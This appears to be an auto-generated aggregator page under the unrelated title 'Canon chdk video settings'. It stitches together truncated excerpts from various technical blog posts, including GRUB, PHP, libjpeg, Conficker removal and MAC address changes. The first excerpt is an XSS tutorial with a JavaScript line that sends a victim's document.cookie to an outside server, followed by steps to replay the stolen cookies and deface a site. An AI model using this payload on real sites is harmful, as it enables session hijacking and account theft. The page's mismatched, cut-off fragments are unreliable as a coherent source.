03 Jan, 2011

Canon chdk video settings

Articles related to canon chdk video settings

XSS - Part 2 (Cookie stealing and Defacement)

http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html ();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;This code will send the cookies to your server. Now embeding the script in url can be done as discussed in part 1.Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).Defacing a websiteTo deface a website , the site must have a system which puts something you submit on their site (like ...
Published 5 years, 5 months ago

Remove Flash Tracking on AddThis module on Drupal 5

http://digitalpbk.com/drupal/remove-flash-tracking-addthis-module-drupal-5 Remove Flash Tracking on AddThis module on Drupal 5 If you use AddThis module on drupal, you might have noticed that a 1px by 1px flash object is created which sets tracking cookies on your pages. This is transparent to the user most time and you will see it only under generated source view. The flash button is added dynamically by the addThis module on the top of the page. This sometimes can be annoying since a white bar can appear at the top of the page due to this. In drupal 6, the flash ...
Published 2 years, 6 months ago

Change Network adapter MAC address on Windows 7

http://digitalpbk.com/windows/change-network-adapter-mac-address-windows-7 Change Network adapter MAC address on Windows 7 that the MAC addresses does not collide. Most of us thought we cant change it, but yes we can change the MAC address. To change Mac Address in Windows 7 Open Control Panel > Network and Internet > Network and Sharing Center Click on Change adapter settings as highlighted in the screenshot above. Right click on your network connection (Local Area LAN or Wireless WAN) and click Properties. On the properties window click Configure. On the advance tab, click Network Address and Enter ...
Published 2 years, 2 months ago

jwgkvsq.vmx - Conficker virus manual removal

http://digitalpbk.blogspot.com/2009/04/jwgkvsqvmx-conficker-virus-manual.html "zbtthjd")Now goto HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\zbtthjd\Parameters, note the ServiceDLL Parameter, It would be something like c:\windows\system32\.dllTake a Command prompt and runsvchost -k netsvcs. This should stop the netsvcs and the virus.Try deleting the DLL file or else rename the DLL file to something elseRestart the System.Renable Services Automatic Updates and BITS.Note if you find these methods not applicable in your case, the virus must have morphed to some other form ...
Published 3 years, 1 month ago

Using PHP for more than HTML

http://digitalpbk.blogspot.com/2007/04/using-php-for-more-than-html.html in the use of the GD library. Returning other formatsOther formats can be returned from php via the same way by changing the Content-Type header and giving the appropriate body.Example : header("Content-Type: text/javascript");?>function Foo(){}echo "function Rand() { } ";?>It is also a good practice to set the content-length header, in case you know the size of the body you are about to send in advance. (In case you are sending an image).Common Content TypesHTML TEXTtext ...
Published 5 years ago

Changing the default Boot OS in GRUB on Ubuntu 9.10

http://digitalpbk.com/ubuntu-grub/changing-default-boot-os-grub-ubuntu-910 memtest86+ image: /boot/memtest86+.bin Found Microsoft Windows XP Home Edition on /dev/sda1 done Reboot the system to verify your changes. Happy Booting ;) Note: Although I found a built in command grub-set-default, It did not seem to do the job. On /etc/grub.d Directory you can see many files named in the format XX_...where XX is a 2 digit number. The ones starting with 0 are not listed. Rest is starting from 1X, 2X, 3X etc. 1X_ would be your linux operating system2X_ would be usually ...
Published 2 years, 6 months ago

C Code to convert JPEG to BMP in LINUX using libjpeg

http://digitalpbk.blogspot.com/2009/01/code-libjpeg-converting-jpeg-to-bmp.html ; memset ((char *)&bh;,0,sizeof(BMPHEAD)); /* sets everything to 0 */ //bh.filesize = calculated size of your file (see below) //bh.reserved = two zero bytes bh.headersize = 54L;// (for 24 bit images) bh.infoSize = 0x28L;// (for 24 bit images) bh.width = width ;//in pixels of your image bh.depth = height;// in pixels of your image bh.biPlanes = 1 ;//(for 24 bit images) bh.bits = 24 ;//(for 24 bit images) bh.biCompression = 0L;;// (no compression) int bytesPerLine; bytes ...
Published 3 years, 4 months ago

HTTP 1.1 Response Status Codes

http://digitalpbk.blogspot.com/2007/04/http-11-response-status-codes.html : Request range out of bounds.417 Expectation Failed : Server failed to meet the requirements of the Expect Header Request.500 - 599 : Server ErrorsReturned when the server encounters errors.500 Internal Server Error : Server config. setting or an external program has caused an error501 Not Implemented : Server does not have the functionality to fulfill request502 Bad Gateway : The Server encountered an invalid response from an upstream server or proxy503 Service Unavailable : Service is temporarily ...
Published 5 years, 1 month ago

Network Traffic Calculator using VC++ 6 on XP

http://digitalpbk.blogspot.com/2006/11/network-traffic-calculator-using-vc-6.html ; } case WM_PAINT: hdc=BeginPaint(hwnd,&ps;); strcpy(bfr ,"Data S/R: "); itoa(total.mb,num,10); strcat(bfr,num); strcat(bfr,"."); itoa(total.kb,num,10); strcat(bfr,num); strcat(bfr,"."); itoa(total.bytes,num,10); strcat(bfr,num); l=strlen(bfr); SetWindowText(txtW,bfr); EndPaint(hwnd,&ps;); return 0; case WM_DESTROY: WSAAsyncSelect(gSokt,hwnd,0x401,0); closesocket(gSokt); if(WSAIsBlocking())WSACancelBlockingCall(); WSACleanup(); PostQuitMessage(0 ...
Published 5 years, 5 months ago

Related help topics for canon chdk video settings More keywords like canon chdk video settings
More pages for canon chdk video settings


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Radha Nagar Beach Radha Nagar Beach in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk